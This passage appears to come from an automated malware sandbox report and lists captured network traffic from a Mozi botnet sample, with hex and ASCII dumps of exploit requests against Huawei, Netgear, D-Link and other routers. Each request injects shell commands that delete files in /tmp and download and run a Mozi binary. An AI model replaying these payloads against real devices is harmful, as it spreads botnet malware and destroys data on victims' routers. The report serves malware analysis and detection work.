70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 13.181.134.67:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 8.59.167.66:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 130.32.148.122:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 211.88.161.35:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 146.52.84.8:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 64.125.188.154:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 118.111.155.25:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 150.74.198.161:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 